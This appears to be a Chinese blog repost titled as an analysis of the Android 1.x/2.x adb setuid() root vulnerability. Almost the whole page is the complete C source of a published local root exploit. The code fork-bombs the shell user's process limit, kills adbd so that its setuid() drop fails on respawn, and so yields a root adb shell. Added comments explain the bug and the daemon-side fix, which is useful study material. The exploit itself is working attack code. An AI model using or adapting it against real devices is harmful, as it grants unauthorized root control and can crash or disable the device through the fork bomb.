Android adb setuid提权漏洞之分析
2014-10-17 12:08
/* android 1.x/2.x adb setuid() root exploit
 * (C) 2010 The Android Exploid Crew
 *
 * Needs to be executed via adb -d shell. It may take a while until
 * all process slots are filled and the adb connection is reset.
 *
 * !!!This is PoC code for educational purposes only!!!
 * If you run it, it might crash your device and make it unusable!
 * So you use it at your own risk!
 */

/* NOTE(review): what this PoC demonstrates, for the reader analysing the bug.
 * The daemon started as root and called setuid() to drop to the shell user.
 * setuid() can fail — here because RLIMIT_NPROC for that uid is exhausted
 * (see the fork loop in main) — and a caller that does not check its return
 * value keeps running with the privileges it meant to give up. The hardening
 * is on the daemon side: treat a failed setuid()/setgid() as fatal (exit),
 * and keep a per-uid NPROC limit so a single uid cannot exhaust the process
 * table for everyone. The code below is left byte-for-byte as published;
 * comments only.
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <signal.h>
#include <stdlib.h>

/* Print msg with the current errno text and terminate.
 * The exit status is errno as seen after perror(); whether perror()
 * preserves errno is not guaranteed by the C standard, so the status
 * is best-effort.
 */
void die(const char *msg)
{
    perror(msg);
    exit(errno);
}

/* Scan /proc/<pid>/cmdline for pid 0..31999 and return the first pid whose
 * command line contains "/sbin/adb"; 0 if none is found.
 * buf is zero-filled before the read, so strstr() stays within the buffer
 * even though read()'s return value is ignored (a failed read simply reads
 * as "no match"). cmdline is NUL-separated, so strstr() effectively sees
 * only argv[0].
 */
pid_t find_adb()
{
    char buf[256];
    int i = 0, fd = 0;
    pid_t found = 0;

    for (i = 0; i < 32000; ++i) {
        sprintf(buf, "/proc/%d/cmdline", i);
        if ((fd = open(buf, O_RDONLY)) < 0)
            continue;
        memset(buf, 0, sizeof(buf));
        read(fd, buf, sizeof(buf) - 1);
        close(fd);
        if (strstr(buf, "/sbin/adb")) {
            found = i;
            break;
        }
    }
    return found;
}

/* SIGKILL (9) the daemon; the "restart" relies on init respawning it,
 * which this code never verifies.
 */
void restart_adb(pid_t pid)
{
    kill(pid, 9);
}

/* Poll once a second until find_adb() reports a pid other than old_adb,
 * wait 5 more seconds, then SIGKILL every process this uid may signal
 * (kill(-1, 9)). That final kill is what releases the exhausted process
 * slots — and also tears down everything else owned by the uid.
 * The name assumes the new daemon is still root; nothing here checks it.
 */
void wait_for_root_adb(pid_t old_adb)
{
    pid_t p = 0;

    for (;;) {
        p = find_adb();
        if (p != 0 && p != old_adb)
            break;
        sleep(1);
    }
    sleep(5);
    kill(-1, 9);
}

/* Entry point. Steps, in order:
 *  1. refuse to run when RLIMIT_NPROC is unlimited (the loop below would
 *     never see fork() fail);
 *  2. locate the running daemon;
 *  3. detach (fork + setsid) so the process survives the adb reset it
 *     announces;
 *  4. in a child, fork until fork() fails, then signal the parent through
 *     the pipe and keep forking;
 *  5. the parent blocks on that pipe, kills the daemon, and waits for the
 *     respawned one.
 * argc/argv are unused.
 */
int main(int argc, char **argv)
{
    pid_t adb_pid = 0, p;
    int pids = 0, new_pids = 1;
    int pepe[2];
    char c = 0;
    struct rlimit rl;

    printf("[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n");
    printf("[*] checking NPROC limit ...\n");
    if (getrlimit(RLIMIT_NPROC, &rl) < 0)
        die("[-] getrlimit");
    if (rl.rlim_cur == RLIM_INFINITY) {
        printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n");
        exit(1);
    }
    /* %lu assumes rlim_t is unsigned long — holds on the Linux/bionic
     * targets this was written for, not portably. */
    printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max);
    printf("[*] Searching for adb ...\n");
    adb_pid = find_adb();
    if (!adb_pid)
        die("[-] Cannot find adb");
    printf("[+] Found adb as PID %d\n", adb_pid);
    printf("[*] Spawning children. Dont type anything and wait for reset!\n");
    printf("[*]\n[*] If you like what we are doing you can send us PayPal money to\n"
           "[*] 7-4-3-C@web.de so we can compensate time, effort and HW costs.\n"
           "[*] If you are a company and feel like you profit from our work,\n"
           "[*] we also accept donations > 1000 USD!\n");
    printf("[*]\n[*] adb connection will be reset. restart adb server on desktop and re-login.\n");
    sleep(5);
    /* Detach from the adb shell session: parent exits, child becomes a
     * session leader with no controlling terminal. */
    if (fork() > 0)
        exit(0);
    setsid();
    pipe(pepe);

    /* generate many (zombie) shell-user processes so restarting
     * adb's setuid() will fail.
     * The whole thing is a bit racy, since when we kill adb
     * there is one more process slot left which we need to
     * fill before adb reaches setuid(). Thats why we fork-bomb
     * in a separate process.
     */
    if (fork() == 0) {
        close(pepe[0]);
        for (;;) {
            if ((p = fork()) == 0) {
                exit(0);
            } else if (p < 0) {
                /* First fork() failure: the per-uid slot count is full.
                 * Wake the parent once (new_pids guards the one-shot),
                 * then keep looping so any slot that frees up is retaken. */
                if (new_pids) {
                    printf("\n[+] Forked %d childs.\n", pids);
                    new_pids = 0;
                    write(pepe[1], &c, 1);
                    close(pepe[1]);
                }
            } else {
                ++pids;
            }
        }
    }
    /* Parent: block until the child reports exhaustion (read() returns 0 if
     * the child dies first, which also unblocks this). */
    close(pepe[1]);
    read(pepe[0], &c, 1);
    restart_adb(adb_pid);
    /* Two long-sleeping processes; presumably extra slot occupants while the
     * daemon respawns — the published code does not say. */
    if (fork() == 0) {
        fork();
        for (;;)
            sleep(0x743C);
    }
    wait_for_root_adb(adb_pid);
    return 0;
}
一个进程的命令行保存在文件/proc/pid/cmdline中
http://www.claudxiao.net/2011/04/android-adb-setuid/